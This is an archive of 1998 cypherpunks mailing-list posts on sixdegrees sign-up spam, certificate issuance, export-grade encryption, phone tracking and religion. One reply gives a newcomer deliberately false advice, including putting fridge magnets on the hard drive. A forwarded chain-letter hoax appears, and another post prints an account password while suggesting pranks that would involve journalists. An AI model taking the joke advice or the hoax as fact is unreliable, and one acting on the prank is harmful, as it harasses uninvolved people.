troll on CNN recently and other provocations.

Anybody get IRS or other spam/troll about CJ? If so, we'd like 
to see the message with full headers (ID omitted if you
like). Post here or send privately. Anon okay, probably
best. We'll share what we get.

If PGP preferred use the latest PK on the servers for 
<jya@pipeline.com>, or any of the older ones.


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBNgDz7YNEX855Nu9gEQIVcgCfRebUik5OdC0JDOZC0U7/C815I3cAniER
uOjU/6mmkkO/edw80+qMKnN8
=xEON
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sixdegrees"<9kle5004@auto.sixdegrees.com>
Date: Thu, 17 Sep 1998 07:10:19 +0800
To: "monkeyboy cypher-prik"<cypherpunks@toad.com>
Subject: Beste Megan
Message-ID: <199809171204.FAA04484@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Just a quick update from sixdegrees(tm). Unfortunately Beste 
Megan (mb6894a@american.edu) asked not to be listed as your 
contact with sixdegrees.

We also wanted to make sure you were aware that you currently 
have no other confirmed contacts, so it will be hard for you to
have a productive sixdegrees experience. As you probably know, 
without any confirmed contacts, you won't get any results from our 
networking searches. 

So, we just wanted to recommend that you head over to 
http://www.sixdegrees.com , log-in, and go to MY CONTACTS 
to list additional relationships. 


====================================================================
PLEASE NOTE: All replies to this address are processed by a computer.
If you have any problems, questions or requests send an e-mail to 
issues@sixdegrees.com and someone will get back to you as soon as 
possible.
====================================================================


E.DB.BRESP.3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Sep 1998 07:54:31 +0800
To: cryptography@c2.net
Subject: Catchy.
Message-ID: <v04011715b226b727e851@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 17 Sep 1998 08:51:14 -0400
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: Catchy.
Date: Thu, 17 Sep 1998 08:34:49 -0400
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/194
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: nev@bostic.com
Forwarded-by: Kirk McKusick <mckusick@McKusick.COM>
From: Rick Kawala <condor@QueerNet.ORG>

I was with a friend in Cafe Flore the other night and I had to ask the
counterperson what was playing on the stereo. Sort of techno but with
vocals on some tracks, minorish key, really great.  Anyway, the CD arrived
and track 10 is called "PGP". And yes, they're talking about *that* PGP.
My God, an ode to data privacy. This computer thing is getting out of
hand. :)
		Rick

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Thu, 17 Sep 1998 07:50:01 +0800
To: cypherpunks@cyberpass.net
Subject: Re: It's finally over (was Re: Explanation of Harald Fragner and  cypherpunks)
In-Reply-To: <199809170055.UAA28232@domains.invweb.net>
Message-ID: <360106B9.A408FF26@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain





William H. Geiger III wrote:

> ... How does Thwart, Verisign, or the other CA's handle authentication of
> an
> e-mail address in there low level certs?

You generate a key pair on your machine (Netscape keygen tag or MS
CrappyApi.  The public key + other self-referential materiel is sent to
Thawte/Verisign et al (actually I like Thwart better).  This is via broken
PKCS#10 for MS, or proprietary SPKAC for Netscape (ever wondered why there
are multiple buttons for your browser type?).  They then send you a
reference number via email. You cut and paste the number back onto their
site.  A PKCS#7 mimetype is downloaded, causing your browser to grab and
stash your new cert. Netscape stores the key in its own special way, and the
cert in a PKCS#12 format.  MS stores both in PKCS#12 format, which is rather
easy to hack.

If I was to request a cert from Thawte (the only really useful global, free,
full strength one), and specify cyphers@punks.net (a well known interneting
list) as my email address, then the email would be available to all
subscribers of the list.  Certs being public, this is not a problem.  The
crucial part being that the private key I originally generated, matching the
public key in the cert, remains on my machine. I.e. I am the only one who
can decrypt stuff encrypted with the cert's public key.  This is an
interesting way of receiving encrypted mail (pseudo-)anonymously.  Expect to
see a rash of Thawte "collect your new cert" emails, followed by much
encrypted mail that only one list subscriber has the wherewithal to
decrypt.  Another alternative is to distribute the private key to selected
buddies on the list, to provide a shared cert.

Netscape specific: Migrating use of a cert requires an email to yourself
that you will receive on your new machine, after copying the key*.db files
and/or *.p12 files to the netscape/.../users dir, and importing it.

As to how sexdegrees.com could use this technology ... this would require
some degree of know-how which would probably preclude signing up in the
first place.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Thu, 17 Sep 1998 08:12:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Democracy...
In-Reply-To: <35FF220A.F88B87F6@hempseed.com>
Message-ID: <36010BFB.E13E264B@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain





Jaeger wrote:

> I reply to this message going point by point, within the original
> text...  so scroll down if you care to read what I wrote..
>
> > AI recently saw a posting about right v. wrong or good v. evil. These
> > are subjective terms as any good semanticist knows. But what is real
>
> Neither good nor evil is subjective to anything...  if something is
> absolutely evil, then there is nothing that will make it good...  (and
> vice versa <SP?>)
>

IYHO.  You've got to admire these great leaps of intuition. Now if we could
only harness them to constructive acts instead of coercive?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: User of DOOM <nobody@seclab.com>
Date: Thu, 17 Sep 1998 02:31:28 +0800
To: cypherpunks@cyberpass.net
Subject: Predictions: Crime and Criminal Justice in the 21st Century
Message-ID: <199809170730.JAA08534@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



Predictions: Crime and Criminal Justice in the 21st Century

1.	The United States will experience a significant economic 
recession/crisis very close to the turn of the Century.

2.	As the large pool of young people born in the early 1990s 
become teenagers and young adults, there will be a dramatic 
increase in violent crime around the year 2005-2010.

3.	America will experience sporadic civil disorders/riots in 
many of its urban areas during the next 10-15 years -- much of it 
related to racial/ethnic problems.

4.	Terrorist acts by "fringe"/special issue groups will 
increase at a significant rate -- becoming a major law enforcement 
and security problem.

5.	As faith in the criminal justice system declines, there 
will be a rise in vigilante-based incidents where citizens take 
the enforcement of crime problems into their own hands.

6.	Much of middle- and upper-class America will take a 
"retreatist" attitude and move into private high-security 
communities located in suburban or rural areas. Because of 
technological advances, many companies and corporations will also 
move out of the urban environments as well.

7.	Due to many of the predictions listed above, much of law 
enforcement and security in the 21st Century will become 
privatized and contractual. Traditional law enforcement agencies 
will primarily serve urban and rural communities.

8.	Law enforcement will evolve into two major and divergent 
roles: traditional law enforcement and a more specialized 
military tactical role to deal with the growing urban violance 
and terrorist incidents.

9.	Significant violence and unrest will plague our nation's 
prisons. Major prison riots will become a regular occurrence.

10.	With the decrease of the possibility of major global 
warfare, the United States military will take on an increased 
domestic "peace-keeping" role with America's law enforcement 
agencies.





John Young wrote:
> 
> Tim asks:
> 
> >Freeh and Company continue to mumble about "meeting
> >the legitmate needs of law enforcement." What can they
> >be speaking of?
> ...
> >Obviously his side is contemplating domestic crypto restrictions.
> 
> Threat of terrorism will be the impetus for applying national security
> restrictions domestically, for relaxing cold war limitations on spying
> on Americans, for dissolving barriers between law enforcement
> and military/intelligence agencies.
> 
> Technical means for access to encrypted data will probably
> come first in communications, then to stored material. There
> will be an agreement for increased CALEA wiretap funding, which
> is what the two cellular and wired suits against the FBI intend,
> (paralleling what the hardware and software industries want from
> federal buyers of security products).
> 
> This will provide the infrastructural regime for the gov to monitor
> and store domestic traffic as NSA does for the global, using the
> same technology (NSA may provide service to domestic
> LEA as it now does for other gov customers for intel).
> 
> Other access will come through hardware and software for
> computers, paralleling technology developed for telecomm tapping,
> tracking and monitoring.
> 
> Most probably through overt/covert features of microprocessors
> and OS's, as reported recently of Wintel and others, but also
> probably with special chips for DSP and software for modular
> design -- why build from scratch when these handy kits are
> available.
> 
> As noted here, the features will appear first as optional, in response
> to demand from commerce, from parents, from responsible
> institutions, to meet public calls for protection, for privacy, for
> combating threats to the American people.
> 
> Like wiretap law, use of the features for preventative snooping will
> initially require a court order, as provided in several of the crypto
> legislative proposals.
> 
> Like the wiretap orders, gradually there will be no secret court refusals
> for requests to use the technology in the national interest.
> 
> A publicity campain will proclaims that citizens with nothing to hide
> will have nothing to fear. Assurance of safety will be transparent,
> no clicks on the line. In a digital world, home-office devices will send
> lifestyle data to the device manufacturers over the always monitoring
> transparental Net.
> 
> Personal privacy will evaporate almost unnoticeably, as with the tv
> remote control, cp/defcon/bar brag, telephone, fax and forever-lovers
> pillowtalk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Thu, 17 Sep 1998 04:19:11 +0800
To: mmotyka@lsil.com
Subject: Re: Democracy...
Message-ID: <80256682.00312692.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain








mmotyka@lsil.com on 16/09/98 20:02:22

Please respond to mmotyka@lsil.com

To:   Richard Bragg/UK/SSA_EUROPE
cc:   cypherpunks@toad.com
Subject:  Re: Democracy...




>> However, if you believe in something to be life changing and
>> beneficial to both the >individual and society you'll want or be
>> compelled to "pass it on".
>
>Altruistic on the surface. Regarding religion though, why do I always
>get the feeling that when implemented and empowered it is judgemental
>and intolerant of those who do not fall properly in line?
>
Because religion is dead.  It is a set of man made rules interpreting
what God has said.  I do not want to live in a "religious" society any
more than you do.  Theocracy (rule by the church, small "c") is never
a good idea.  Deocracy??? (rule by God) is.  God has already given us
His instructions for healthy life and society.  Most of our laws are
based on them but we keep weakening them to account for our own failings
and desires.

>> What I wanted to illustrate is that there are absolutes, to say there
>> are no obsolutes is in itself an absolute and so is self defeating.
>
>All right Mr. Logic, you're so sharp, give me ONE example of a *moral*
>absolute.
>
It is wrong to abuse children.  I reckon this is built in to just about
all of us.  It is in our nature to protect and defend our children.  No
matter where your are in the world this applies.  Our differing cultures
make some things acceptable to one and not to others but the underlying
nature is still there.  Also we may differ how we accomplish this.

>> We must have absolutes.
>>
>We do: speed of light, mass of the electron, probably, but behavior? We
>have behaviors that facilitate our persistance and propagation as a
>species at ever increasing densities. Operating outside the boundaries
>is neither right nor wrong, simply different. Not necessarily without
>consequences, but simply different. Your yardstick is an hallucination
>to which you cling to forlornly like a kitten clinging to a stick in a
>raging river.
>
>Mike
>
>ps - is 'forlornly' really a word? I think so, but it looks odd today.

Actually the speed of light varies depending on the medium and the mass of
an electron with its velocity.  You may deride my
absolutes but if applied by all we would have no crime, no divorce etc.
Boring??  Not really.  Many diseases and social problems
would cease or be reduced.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 18 Sep 1998 01:33:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: 128 bit or 40 bit?
In-Reply-To: <67ee9e3cc8499f9d72a11a2df56c48fe@anonymous>
Message-ID: <3.0.5.32.19980917102459.008c97e0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:35 AM 9/17/98 +0900, Anonymous wrote:
>
>Being outside North America, I have an "export" version of 
>Internet Explorer/Netscape Navigator. These offer 40 bit 
>encryption. (40 bit RC4, I understand).
>
>
>My financial institution has a 128 bit Verisign certificate.
>To my surprise, they claim this offers 128 bit encryption to /me/.
>[in transactions to https://secure.mybank.com.xx]

Odd.  On the other hand, if your Netscape browser does have a 40-bit 
limitation problem, you can fix it by going to www.fortify.net.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 16 Sep 1998 22:26:23 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Fwd: I don't care if this is real or not!
In-Reply-To: <199809161001.MAA18320@replay.com>
Message-ID: <Pine.GSO.3.96.980917112008.15117A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain





On Wed, 16 Sep 1998, Anonymous wrote:

> You suck... Die prick, die

I second your motion (or is it second the motion, anyway I hate fwd mails
it only make my eyes sore).

> 
> 
> 
> Crack head <simpsonngan@hotmail.com> wrote:
> >
> > 
> > >Received: from 136.148.1.253 by www.hotmail.com with HTTP;
> > >	Tue, 15 Sep 1998 05:55:15 PDT
> > >X-Originating-IP: [136.148.1.253]
> > >From: "Dodwell Leung" <dodwellleung@hotmail.com>
> > >To: alexccl@hotmail.com, z2181727@student.unsw.edu.au, 
> > antonylam@hotmail.com, chonga@sbu.ac.uk,
> z2183890@student.unsw.edu.au, 
> > lcy@qms.ndirect.co.uk, z2155343@student.unsw.edu.au,
> bahrid@hotmail.com, 
> > daner@mail.mkv.mh.se, Evert.P.deVries@SI.shell.com, 
> > harold.tan@mailexcite.com, ivanyip@hotmail.com, catkoo@hotmail.com, 
> > jennyshek@hotmail.com, BKKsomporb@mail.nomura.com.hk, 
> > joe621@netvigator.com, heyloe@hotmail.com, kmyk@hotmail.com, 
> > kenjess@apanet.com.au, lawhon@hotmail.com, lfan@mail.uoknor.edu, 
> > 95481624J@hkpucc.polyu.edu.hk, shukai@netvigator.com, 
> > z2188635@student.unsw.edu.au, mattgow@hotmail.com, 
> > z2192026@student.unsw.edu.au, z2174314@student.unsw.edu.au, 
> > Steeve.Genot@wanadoo.fr, hsp996@hotmail.com, physpot@asiaonline.net, 
> > pixie_tan@hotmail.com, pooi_lee_chow@hotmail.com,
> eeyatir@hotmail.com, 
> > saralee@chevalier.net, patelsu@sbu.ac.uk, beetch@pacific.net.sg, 
> > z2188232@student.unsw.edu.au, simpsonngan@hotmail.com, 
> > yoon@pacific.net.sg, hamster.sol@lineone.net, stepcom@hkstar.com, 
> > ext3366@yahoo.com, tinyau1@netvigator.com,
> z2193851@student.unsw.edu.au, 
> > huvl@sbu.ac.uk, z2193612@student.unsw.edu.au, willmilk@hotmail.com, 
> > wswinnie@netvigator.com, brackeye@hkstar.com, takleung@wisdom.com.hk
> > >Subject: I don't care if this is real or not! But forwarding is not 
> > hard for me if I help
> > >Content-Type: text/plain
> > >Date: Tue, 15 Sep 1998 05:55:15 PDT
> > >
> > >
> > >>Received: from 202.184.46.2 by www.hotmail.com with HTTP;
> > >>	Tue, 15 Sep 1998 01:39:48 PDT
> > >>X-Originating-IP: [202.184.46.2]
> > >>From: "san san" <seliness@hotmail.com>
> > >>To: alanling@usa.net, calviny@mol.net.my, chowpin@edb.gov.sg, 
> > >chan911@pc.jaring.my, gary_wang@hotmail.com, junifer@pl.jaring.my, 
> > >karren@deakin.edu.au, klay@okstate.edu, lkhoong@pc.jaring.my, 
> > >mcch@hotmail.com, murphy_l@hotmail.com, simfong@pl.jaring.my, 
> > >stchai@pl.jaring.my, mote@hotmail.com, tlliew@tm.net.my, 
> > >wthong@pl.jaring.my, dodwellleung@hotmail.com
> > >>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> > >>Content-Type: text/plain
> > >>Date: Tue, 15 Sep 1998 01:39:48 PDT
> > >>
> > >>
> > >>>Received: from 202.188.25.160 by www.hotmail.com with HTTP;
> > >>>	Mon, 14 Sep 1998 06:27:23 PDT
> > >>>X-Originating-IP: [202.188.25.160]
> > >>>From: "Lim Huey" <shaohuey@hotmail.com>
> > >>>To: alexlimyk@hotmail.com, audrey.looi@mailexcite.com, 
> > >>kianwah19@hotmail.com, enyen@hotmail.com, s9812221@unitele.com.my, 
> > >>rckj@hotmail.com, seliness@hotmail.com, stanchow@tm.net.my, 
> > >>bhchua7@hotmail.com, csheng@rocketmail.com, yoongyow@hotmail.com, 
> > >>ching20@hotmail.com, lphoo@hotmail.com, ken_thong@rocketmail.com, 
> > >>twinsck@hotmail.com, poaysun@yahoo.com, mda97mk@sheffield.ac.uk, 
> > >>yongqiang13@hotmail.com, sammy_lee_79@hotmail.com, 
> > >>tungweileong@hotmail.com, lifesignx@yahoo.com, elim331@yahoo.com, 
> > >>lwloh@hotmail.com, audrey.looi@mailcity.com, sokyee@pc.jaring.my, 
> > >>kah_kit@hotmail.com, siewgar@hotmail.com, chiane@mailcity.com, 
> > >>Vvpenguin@hotmail.com, pkleong@hotmail.com, phangf@hotmail.com, 
> > >>rolandhii@hotmail.com, stjdanzel@hotmail.com,
> leesiehui@hotmail.com, 
> > >>jeennwei@hotmail.com, chouyong@hotmail.com, ttc1979@yahoo.com, 
> > >>guatyen@hotmail.com, chonkit@hotmail.com, thongyp@hotmail.com, 
> > >>soonfung@hotmail.com, tsueyyin@hotmail.com, feiyy@hotmail.com
> > >>>Subject: Fwd: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> > >>>Content-Type: text/plain
> > >>>Date: Mon, 14 Sep 1998 06:27:23 PDT
> > >>>
> > >>>
> > >>>
> > >>>
> > >>>>Date: Mon, 14 Sep 1998 04:25:43 -0700 (PDT)
> > >>>>From: CHEW JUNN WENG <jwchew@rocketmail.com>
> > >>>>Subject: This is serious PLEEEEEEASE PLEASE DON'T DELETE!!!!!
> > >>>>To: lmoonc@hotmail.com, pvcheo@essex.ac.uk, cwnsim@essex.ac.uk,
> > >>>>  yoongyow@hotmail.com, lenelene@hotmail.com,
> gcping38@mailcity.com,
> > >>>>  gthong@rocketmail.com, ching20@hotmail.com, 
> > lcchuan@rocketmail.com,
> > >>>>  moon@tm.net.my, shaohuey@hotmail.com, janelsl@tm.net.my,
> > >>>>  csheng@rocketmail.com, hwooi@yahoo.com, dianacn@hotmail.com,
> > >>>>  stjdanzel@hotmail.com, effyjungle@hotmail.com, 
> > >bus_tard@hotmail.com,
> > >>>>  lphoo@hotmail.com, yakasaki@hotmail.com, colint79@hotmail.com
> > >>>>Cc: anniesia@hotmail.com, pearlng@hotmail.com,
> liangser@hotmail.com,
> > >>>>  choopar@hotmail.com
> > >>>>
> > >>>>
> > >>>>
> > >>>>
> > >>>>
> > >>>>
> > >>>>
> > >>>>Hello, my name is David "Darren" Bucklew. I live in 
> > >>>>Pittsburgh PA where I attend Bethel Park High School
> > >>>>and participate in  many sports.  I have severe
> > >>>>ostriopliosis of the liver. (My liver is extremely 
> > >>>>inflamed).
> > >>>>Modern Science has yet to find a cure.  Valley
> > >>>>Childrens hospital 
> > >>>>> has agreed to donate  7 cents to the National
> > >>>>Diesese Society for every name 
> > >>>> on  this letter.Please send it around as much as you
> > >>>>can.
> > >>>>Thank you,
> > >>>>Darren
> > >>>>
> > >>>>PS: For those of you who dont take 5 minutes to do 
> > >>>>this, what goes around comes around. You can help
> > >>>>sick people, and it costs you nothing,yet you are too
> > >>>>lazy to do it?  You will get what you deserve. 
> > >>>>
> > >>>>_________________________________________________________
> > >>>>DO YOU YAHOO!?
> > >>>>Get your free @yahoo.com address at http://mail.yahoo.com
> > >>>>
> > >>>>
> > >>>
> > >>>
> > >>>______________________________________________________
> > >>>Get Your Private, Free Email at http://www.hotmail.com
> > >>
> > >>
> > >>______________________________________________________
> > >>Get Your Private, Free Email at http://www.hotmail.com
> > >
> > >
> > >______________________________________________________
> > >Get Your Private, Free Email at http://www.hotmail.com
> > 
> > 
> > ______________________________________________________
> > Get Your Private, Free Email at http://www.hotmail.com
> > 
> > 
> 
> ==
> "The same thing we do every night Pinkey,
>  try to take over the WORLD!"
>                           - The brain
> _________________________________________________________
> DO YOU YAHOO!?
> Get your free @yahoo.com address at http://mail.yahoo.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Thu, 17 Sep 1998 12:30:56 +0800
To: <cypherpunks@toad.com>
Subject: RE: Your new password
In-Reply-To: <v04011705b226162bb5d4@[199.125.98.24]>
Message-ID: <000201bde25f$fa59c6c0$942580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



The only thing that would be worse, and definitely should NOT be carried out
by a cypherpunk, is if someone tracked down a certain list like
srbeanies@interhop.net and somehow listed the sixdegrees as a friend.

Seriously, don't even think of torturing those poor 2000 beaniebaby traders
with a gag like this.

X

-----Original Message-----
From:	owner-cypherpunks@minder.net [mailto:owner-cypherpunks@minder.net] On
Behalf Of Lazlo Toth
Sent:	Wednesday, September 16, 1998 7:29 PM
To:	cypherpunks@toad.com
Subject:	Re: Your new password

I predict that naughty cypherpunks will use these passwords to repeatedly
add the following names to "Schlomo"'s list of contacts:

mark@sixdegrees.com
webmaster@sixdegrees.com
postmaster@sixdegrees.com
issues@sixdegrees.com

If that doesn't work, really naughty cypherpunks may also add the addresses
of prominent journalists.

Of course, those things would be WRONG.

-Lazlo


>Name: Schlomo CyberPoopy
>sixdegrees password: linkcusp
>
>Congratulations Schlomo. You're well on your way to
>becoming a full sixdegrees(tm) member. Here is your member
>password: linkcusp. Use it to log-in on the home page
>at the sixdegrees Web site, http://www.sixdegrees.com.
>We'll ask you for a little more information to complete your
>registration, and then you'll be ready to start networking.
>
>It's important that you return to the site and log-in. Your
>membership will not be complete until you do so.
>
>Once you've successfully logged in with your password, just go
>to Personal Profile and you'll be able to choose your own
>password.
>
>Thanks for becoming part of sixdegrees. We're looking forward
>to seeing you at the site.
>
>====================================================================
>PLEASE NOTE: All replies to this address are processed by a computer.
>If you believe you received this e-mail in error, and it was not your
>intention to become a sixdegrees member, or if you have any problems,
>questions or requests send an e-mail to issues@sixdegrees.com
>and someone will get back to you as soon as possible.
>====================================================================
>
>
>E.SI.BAM.1





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 17 Sep 1998 13:29:42 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Democracy... (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A192846AD@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Atheism means that one believes that there is no God.

You trying to claim atheism is a religion itself is like the christians
always claiming non-christians are satin worshippers. Forget about the
origination of the word, in today's reality most atheists simply forgo
religion completely.

There is no reason to think that a god does exist, so why would one even
need to think about or believe in the negative.

> Ah, so there are personal beliefs that aren't religion and 
> then there are personal beliefs that are?

Yes, beliefs based on valid reason, empiricism and science are not
religious, the generally follow the path from conjecture to theory to
fact. You may hold lots of personal conjecture that do qualify as
beliefs but are not religious in nature, they are not exempt from
empirical evidence and the laws of thermodynamics. Beliefs based on
faith and mysticism are religious. Religion is irrational.

> What a self-rightous, pretentious,  egotistical viewpoint.

Thank you.

> Actualy not, the vast majority of people believe in God, just not your
> particular brand - which after all is what the 1st is all about.

Perhaps in Bible-belt Texas, not around here (not in the city anyway).

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Thu, 17 Sep 1998 12:31:02 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: software
In-Reply-To: <63f88dc4.36006a60@aol.com>
Message-ID: <000301bde260$d04bac80$942580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



AOL.  It had to, HAD to be AOL.

Okay, here goes:  Radio Shack sells an electromagnetic PCMCIA card that you
slip in your computer, juice it up, and it will encrypt everything for free,
to the extent that it will be unrecoverable by even the NSA.

I think they're about three dollars American.

Give it a shot.  (Fridge magnets placed directly on the hard drive can help,
but it's a long shot.)

X

-----Original Message-----
From:	owner-cypherpunks@minder.net [mailto:owner-cypherpunks@minder.net] On
Behalf Of CHerr58414@aol.com
Sent:	Wednesday, September 16, 1998 7:48 PM
To:	cypherpunks@cyberpass.net
Subject:	software

if u got any freeware for encripting and decodeing that would be great so if
you can mail me back some info. Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 17 Sep 1998 13:56:12 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Mobile phone tracking, pagers, etc
Message-ID: <33CCFE438B9DD01192E800A024C84A192846AF@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Regarding the tracking of mobile phones, are all current types of phones
susceptible?

There was a recent post here regarding tracking of GSM phones.
TDMA/CDMA, analog/digital, PCS-band, etc, are they all equally capable
of being tracked?

However pagers are not, correct? They just broadcast an entire area to
page instead of the pager keeping the network informed of their
location.

One thing I have long wondered: Why don't they make phones that
"wake-up" by a paging signal and then accept the call? It might increase
the connect time significantly, but it would also increase the potential
stand-by time indefinitely, and the location of the user is only exposed
when calls are in progress, not while the phone is on stand-by.

Are there any paging services (particularly alpha paging) that work on a
global scale? You would think daily pager rental service (esp. at
airports) would be popular. You could have an email address, even a
static phone number, that could re-route messages to any pager that you
happen to have at the time (PSTN-IP-PSTN, or even easier if the pager
service gives SMTP addresses, which most do these days).

Similarly a PSTN-IP-PSTN interface for voice could give you a static
phone number that you could dynamically forward anywhere untraceably.

BTW, why are most businesses so hostile to pseudonyms? I go to rent a
mailbox, paid 1 yr. in advance with cash, and they still want two pieces
of photo ID to copy.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 16 Sep 1998 23:08:10 +0800
To: cypherpunks@toad.com
Subject: PGP again....
In-Reply-To: <Pine.GSO.3.96.980910124631.26386B-100000@mudspring.uplb.edu.ph>
Message-ID: <Pine.GSO.3.96.980917120006.16936A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



I've tried looking for PGP and found many.
All are  platforms for  IBM PC's (using ms dos, windows).

Is there one  for Sun Sparc and the likes or I'll just run the PGP for
PC's in my Sparc (using unix or PC's using unix).

(forgive me for my lack of info about PGP and platforms).













~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nina H. Fefferman" <feferman@math.princeton.edu>
Date: Thu, 17 Sep 1998 11:22:42 +0800
To: coderpunks@toad.com
Subject: Coding theory, cryptography, and number theory conference at USNA
Message-ID: <Pine.SUN.3.91.980917121143.2651C-100000@math.princeton.edu>
MIME-Version: 1.0
Content-Type: text/plain




	I'm probably the only person in the world who doesn't already 
know about this, but just in case, the URL is 
http://web.usna.navy.mil/~wdj/talk98_30.htm

				Nina
------------------------------------------------------------------------
Preliminary information on
Conference on Coding theory, Cryptology, and Number Theory

version 9-14-98

Place: USNA Math Dept

Time: October 25, 26 of 1998
Coding theory and crypology/number theory will be on
Sunday the 25th, including talks by
Carl Pomerance and Neil Sloane. More crypology/number theory
on Monday and then Prof Hilton
will speak Monday night the 26th.

Main speakers:

Peter Hilton, SUNY Binghamton (Oct 26th, 7-8pm)

Carl Pomerance, U Georgia (Oct 25th, noon?)

Neil Sloane, AT&T Research Labs (Oct 24th, 4-5pm?)

Other speakers will probably be local: Bill Wardlaw (USNA),
some speakers from NSA, etc.

All material will be unclassified. We will try to have midshipman
in attendence.

This conference is being supported by a generous
grant from the NSA.

--
David Joyner, Assoc Prof of Math
US Naval Academy, Annapolis, MD 21402
(410)293-6738
wdj@nadn.navy.mil
http://web.usna.navy.mil/~wdj/homepage.html
++++++++++++++++++++++++++++++++++++++++++++
"A Mathematician is a machine for turning
coffee into theorems." Alfred Renyi







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 17 Sep 1998 15:03:30 +0800
To: "Cypherpunks (E-mail)" <mark@sixdegrees.com>
Subject: RE: A personal response to your email to sixdegrees
Message-ID: <33CCFE438B9DD01192E800A024C84A192846B6@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Declan McCullagh [mailto:declan@well.com] wrote:
> Better yet, give anyone on the mailing list a veto over their new
> membership. Send a cookie to the address that was signed up, and an
> anti-cookie. If anyone returns the anti-cookie, in effect 
> saying "we don't want to be part of your blasted service," put them 
> on a list of do-not-contact people for half a year or so.

An anti-cookie, I like it.

LISTSERV provides a cookie and makes you type "ok" in the body. Making
that "ok" or "cancel" and keeping the cookie active for a day or so
seems like it would be a really simple modification. One "cancel" of
course is over-riding and final.

Similarly for majordomo and other custom acknowledgement schemes.

	Matt


-----Original Message-----
From: Matthew James Gering [mailto:mgering@ecosystems.net] 

> ---Mark Salamon <mark@sixdegrees.com> wrote:
> >
> > Thanks for the reply.  I have now received about 10 such 
> > replies.  We will take them to heart, remove the cypherpunks 
> > and attempt to deal with the mailing list issue in an 
> > intelligent way.

Most lists and services have dealt with the problem of someone
accidentally subscribing or maliciously subscribing someone else in one
of two ways:

A) send and acknowledgement message with a randomly generated
authorization code that requires the user to respond.
B) send out a password and require the user to login before account is
activated.

This works only if you assume the malicious individual will not receive
mail sent to that address. This therefore falls down when the address is
a mailing list or other distribution point that the malicious individual
has access to directly or via archives.




